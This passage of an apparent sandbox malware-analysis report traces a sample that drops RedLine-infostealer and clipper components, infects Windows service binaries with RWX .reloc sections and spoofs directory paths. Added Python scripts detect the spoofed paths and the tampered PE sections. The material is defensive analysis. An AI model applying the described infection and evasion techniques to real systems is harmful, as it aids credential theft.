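    spoofed = [(raw, clean) for raw, clean in zip(comps, trimmed) if raw != clean]
    canonical = "\\".join(trimmed)
    low = canonical.lower()
    root = next((r for r in PROTECTED_ROOTS if low == r or low.startswith(r + "\\")), None)
    return {
        "path": path,
        "canonical": canonical,
        "spoofed": bool(spoofed),
        "spoofed_components": spoofed,
        "impersonates": root if spoofed else None,
    }


def scan_events(lines):
    """Return (process, action, raw path, canonical path) for every file event
    whose target is a look-alike of a protected directory."""
    findings = []
    for line in lines:
        m = EVENT_RE.match(line)
        if not m:
            continue
        info = classify_path(m.group("target"))
        if info["impersonates"]:
            findings.append((m.group("proc"), m.group("action"), info["path"], info["canonical"]))
    return findings


if __name__ == "__main__":
    for proc, action, raw, canonical in scan_events(SAMPLE_EVENTS):
        print(f"{proc} {action} {raw!r} -> looks like {canonical}")
```

On a live host the same classify_path check applies to process image paths and service binary paths, where the spoofed component is just as easy to overlook in a listing.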
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CF20C4 0_2_02CF20C4
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EE74B1 7_2_00EE74B1
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF4875 7_2_00EF4875
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EE540A 7_2_00EE540A
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EE4C10 7_2_00EE4C10
Source: C:\Users\Public\alpha.pif Code function: 7_2_00F04191 7_2_00F04191
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EE9144 7_2_00EE9144
Source: C:\Users\Public\alpha.pif Code function: 7_2_00F0695A 7_2_00F0695A
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF4EC1 7_2_00EF4EC1
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF3EB3 7_2_00EF3EB3
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF5A86 7_2_00EF5A86
Source: C:\Users\Public\alpha.pif Code function: 7_2_00F0769E 7_2_00F0769E
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EED660 7_2_00EED660
Source: C:\Users\Public\alpha.pif Code function: 7_2_00F03E66 7_2_00F03E66
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EE6E57 7_2_00EE6E57
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EE7A34 7_2_00EE7A34
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EEEE03 7_2_00EEEE03
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF0BF0 7_2_00EF0BF0
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF0740 7_2_00EF0740
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EE6B20 7_2_00EE6B20
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_004028B0 13_2_004028B0
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00418244 13_2_00418244
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_004193C4 13_2_004193C4
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_0044E3F6 13_2_0044E3F6
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00402B90 13_2_00402B90
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_004073A0 13_2_004073A0
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00408C60 13_2_00408C60
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_0040DC11 13_2_0040DC11
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00407C3F 13_2_00407C3F
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00418CCC 13_2_00418CCC
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00406CA0 13_2_00406CA0
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_0041A4BE 13_2_0041A4BE
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00401650 13_2_00401650
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00402F20 13_2_00402F20
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00418788 13_2_00418788
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00402F89 13_2_00402F89
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_05AB0960 13_2_05AB0960
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_05AB6840 13_2_05AB6840
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_05AB12DC 13_2_05AB12DC
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_007000D9 13_2_007000D9
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_006C51EE 13_2_006C51EE
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_007039A3 13_2_007039A3
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_006F5980 13_2_006F5980
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_006C6EAF 13_2_006C6EAF
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_006C7B71 13_2_006C7B71
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_006FD580 13_2_006FD580
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_006FC7F0 13_2_006FC7F0
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_006C7F80 13_2_006C7F80
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_006F3780 13_2_006F3780
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_02AC1020 13_2_02AC1020
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_02AC1030 13_2_02AC1030
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_064317F8 13_2_064317F8
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_0643A500 13_2_0643A500
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_06430F28 13_2_06430F28
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_06430BE0 13_2_06430BE0
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_0643D9B0 13_2_0643D9B0
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_064337E7 13_2_064337E7
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_064337F8 13_2_064337F8
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_06DC31C3 13_2_06DC31C3
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EE74B1 15_2_00EE74B1
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF4875 15_2_00EF4875
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EE540A 15_2_00EE540A
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EE4C10 15_2_00EE4C10
Source: C:\Users\Public\alpha.pif Code function: 15_2_00F04191 15_2_00F04191
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EE9144 15_2_00EE9144
Source: C:\Users\Public\alpha.pif Code function: 15_2_00F0695A 15_2_00F0695A
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF4EC1 15_2_00EF4EC1
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF3EB3 15_2_00EF3EB3
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF5A86 15_2_00EF5A86
Source: C:\Users\Public\alpha.pif Code function: 15_2_00F0769E 15_2_00F0769E
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EED660 15_2_00EED660
Source: C:\Users\Public\alpha.pif Code function: 15_2_00F03E66 15_2_00F03E66
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EE6E57 15_2_00EE6E57
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EE7A34 15_2_00EE7A34
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EEEE03 15_2_00EEEE03
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF0BF0 15_2_00EF0BF0
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF0740 15_2_00EF0740
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EE6B20 15_2_00EE6B20
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Process token adjusted: Load Driver
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Process token adjusted: Security
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: String function: 0040E1D8 appears 42 times
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: String function: 02CF44DC appears 74 times
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: String function: 02CF46D4 appears 244 times
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: String function: 02D0894C appears 56 times
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: String function: 02CF4500 appears 33 times
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: String function: 02CF4860 appears 949 times
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: String function: 02D089D0 appears 45 times
Source: elevation_service.exe.13.dr Static PE information: Number of sections : 12 > 10
Source: elevation_service.exe0.13.dr Static PE information: Number of sections : 12 > 10
Source: C6dAUcOA6M.exe Binary or memory string: OriginalFilename vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1426009881.0000000021B32000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1300720331.0000000002B55000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1439616060.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000002.1504921162.00000000209D0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000002.1540095281.0000000021EA2000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020A54000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1300507084.000000007FC50000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000002.1458982491.0000000002B53000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1426009881.0000000021B03000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1300720331.0000000002B51000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020AA2000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020AA2000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1439616060.0000000021B3B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000002.1576898183.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000002.1458982491.0000000002B4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000002.1453650948.00000000023A5000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs C6dAUcOA6M.exe
Source: unknown Driver loaded: C:\Windows\System32\drivers\AppVStrm.sys
Source: C6dAUcOA6M.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: 13.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 40.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 32.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 13.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 32.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: armsvc.exe.11.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.13.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.13.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.13.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FXSSVC.exe.13.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.13.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.13.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
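Every one of the dropped service binaries listed above (armsvc.exe, alg.exe, AppVClient.exe, DiagnosticsHub.StandardCollector.Service.exe, FXSSVC.exe, both elevation_service.exe copies) now carries a .reloc section marked INITIALIZED_DATA|DISCARDABLE|EXECUTE|READ|WRITE. A relocation section never needs to execute and no normal linker emits a writable, executable section; a last section flipped to RWX on otherwise legitimate binaries is consistent with an appending infector that stores its code there. The following is an added Python example, not part of the report and using no third-party modules: it reads the section table straight from the PE headers, prints the characteristics in the report's naming, and flags W+X sections and data-only sections that are executable. build_pe constructs a minimal header-only sample so the check runs offline; the same functions take the bytes of a real file.

```python
import struct

# Section characteristic bits from winnt.h (only the ones used here).
IMAGE_SCN_CNT_CODE             = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_DISCARDABLE      = 0x02000000
IMAGE_SCN_MEM_EXECUTE          = 0x20000000
IMAGE_SCN_MEM_READ             = 0x40000000
IMAGE_SCN_MEM_WRITE            = 0x80000000
FLAG_NAMES = {
    IMAGE_SCN_CNT_CODE: "IMAGE_SCN_CNT_CODE",
    IMAGE_SCN_CNT_INITIALIZED_DATA: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    IMAGE_SCN_MEM_DISCARDABLE: "IMAGE_SCN_MEM_DISCARDABLE",
    IMAGE_SCN_MEM_EXECUTE: "IMAGE_SCN_MEM_EXECUTE",
    IMAGE_SCN_MEM_READ: "IMAGE_SCN_MEM_READ",
    IMAGE_SCN_MEM_WRITE: "IMAGE_SCN_MEM_WRITE",
}
# Sections that carry data in a normal build and never need to execute.
DATA_ONLY = {".reloc", ".rsrc", ".rdata", ".data", ".idata", ".pdata"}


def section_headers(data):
    """Walk MZ -> e_lfanew -> PE signature -> COFF header -> section table (40-byte entries)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    _machine, n_sections, _ts, _symtab, _nsyms, opt_size, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    table = coff + 20 + opt_size          # section table follows the optional header
    out = []
    for i in range(n_sections):
        name, vsize, va, raw_size, raw_ptr, _r, _l, _nr, _nl, flags = struct.unpack_from(
            "<8sIIIIIIHHI", data, table + 40 * i)
        out.append({"name": name.split(b"\0", 1)[0].decode("latin-1"), "va": va, "vsize": vsize,
                    "raw_ptr": raw_ptr, "raw_size": raw_size, "flags": flags})
    return out


def describe_flags(flags):
    """Render characteristics in the same order and naming as the report lines above."""
    return [name for bit, name in sorted(FLAG_NAMES.items()) if flags & bit]


def suspicious_sections(data):
    """Return (section name, reasons) for W+X sections and for data-only
    sections that were made executable."""
    findings = []
    for s in section_headers(data):
        reasons = []
        if s["flags"] & IMAGE_SCN_MEM_EXECUTE and s["flags"] & IMAGE_SCN_MEM_WRITE:
            reasons.append("writable and executable")
        if s["name"] in DATA_ONLY and s["flags"] & IMAGE_SCN_MEM_EXECUTE:
            reasons.append(f"{s['name']} marked executable")
        if reasons:
            findings.append((s["name"], reasons))
    return findings


def build_pe(sections):
    """Constructed test input: DOS header, PE signature, COFF header with an
    empty optional header (enough for the parser, not a loadable image) and
    one 40-byte header per (name, flags) pair."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0102)
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode("ascii").ljust(8, b"\0"),
                    0x1000, 0x1000 * (i + 1), 0x200, 0x400 + 0x200 * i, 0, 0, 0, 0, flags)
        for i, (name, flags) in enumerate(sections))
    return bytes(dos) + b"PE\0\0" + coff + table


if __name__ == "__main__":
    # .reloc exactly as the dropped files report it: INITIALIZED_DATA|DISCARDABLE|EXECUTE|READ|WRITE
    sample = build_pe([(".text", 0x60000020), (".reloc", 0xE2000040)])
    for name, reasons in suspicious_sections(sample):
        print(name, describe_flags(0xE2000040), "->", "; ".join(reasons))
```

For the dropped files themselves, pass open(path, "rb").read() to suspicious_sections; comparing the flagged section's raw_ptr and raw_size against the original (pre-infection) binary shows where the appended code lives.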
Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, cPs8D.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, 72CF8egH.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, G5CXsdn.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, 3uPsILA6U.cs Cryptographic APIs: 'CreateDecryptor'
Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, 6oQOw74dfIt.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, aMIWm.cs Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, 3QjbQ514BDx.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.spre.troj.spyw.evad.winEXE@59/159@135/22
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CF7FD4 GetDiskFreeSpaceA, 0_2_02CF7FD4
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 13_2_004019F0
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D06DC8 CoCreateInstance, 0_2_02D06DC8
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 13_2_004019F0
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_006ECBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW, 13_2_006ECBD0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe File created: C:\Users\Public\Libraries\PNO
Source: C:\Users\Public\Libraries\aymtmquJ.pif Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-605af54964cdb3b4-inf
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7256:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Mutant created: NULL
Source: C:\Windows\System32\alg.exe Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-605af54964cdb3b49ea72c54-b
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Mutant created: \Sessions\1\BaseNamedObjects\Phoenix_Clipper_666
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3192:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-605af54964cdb3b4cd68e75b-b
Source: C:\Users\Public\Libraries\aymtmquJ.pif File created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Command line argument: 08A 13_2_00413780
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Juqmtmya.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Juqmtmya.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Juqmtmya.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Juqmtmya.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\aymtmquJ.pif File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C6dAUcOA6M.exe ReversingLabs: Detection: 63%
Source: C6dAUcOA6M.exe Virustotal: Detection: 62%
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe File read: C:\Users\user\Desktop\C6dAUcOA6M.exe
Source: C:\Users\Public\Libraries\aymtmquJ.pif Evasive API call chain: __getmainargs,DecisionNodes,exit
